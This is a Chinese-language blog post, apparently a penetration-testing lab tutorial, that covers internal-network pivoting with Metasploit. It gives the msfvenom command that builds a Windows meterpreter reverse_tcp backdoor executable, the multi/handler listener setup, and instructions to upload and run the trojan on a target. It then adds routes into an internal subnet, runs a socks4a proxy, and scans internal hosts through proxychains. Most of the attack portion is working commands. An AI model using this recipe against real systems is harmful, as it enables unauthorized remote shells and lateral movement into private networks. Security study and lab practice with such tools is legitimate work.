标签:机器 扫描 端口 123 20210215web 内网 路由
生成metasploit后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exe
- 1
kali监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.196
set lport 12345
exploit
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
手动上传木马文件到目标机器,并执行。
msf绘画中常用命令
查看当前用户 getuid
进入cmd交互shell界面 Shell
Systeminfo //在cmd交互shell下执行,显示目标系统信息。
获取网卡信息 ifconfig
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
路由信息
run get_local_subnets //可以用此命令查看目标机器所在内网网端信息与公网网端信息。
- 1
增加路由
run autoroute -s 10.10.10.0/24
//添加一条通向目标服务器内网的路由,即让目标路由分配给当前kali一个内网IP。
//此时,msf就可以直接访问目标内网中其他机器。
- 1
- 2
- 3
run autoroute –p
//查看有没有新增成功,下图这种出现结果即表明新增成功。
- 1
Background
//返回,把meterpreter后台挂起
- 1
开启socks 4代理
use auxiliary/server/socks4a
// 让Metasploit可以作为一个SOCKS代理服务器
Set srvport 10044 //设置服务端口
- 1
- 2
- 3
修改本机kali的网络配置文件
/etc/prxoychains.conf
- 1
扫描/访问内网其他机器
新开一个窗口扫描端口服务,扫描内网中其他机器端口开放情况。
- 1
扫描到80端口开放;另外这个速度有一点慢。
采用tcp扫描,禁止ping操作。
- 1
- 2
- 3
也可以扫描一些其他常用端口:
如果全是timeout那么就应该思考一下,是不是配置出错。
如msf里端口,或者/etc/prxoychains.conf文件内容不对。
- 1
- 2
- 3
也可以用proxychains代理火狐访问一些其他内网机器
标签:机器,扫描,端口,123,20210215web,内网,路由 来源: https://blog.csdn.net/qq_45290991/article/details/116837501
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。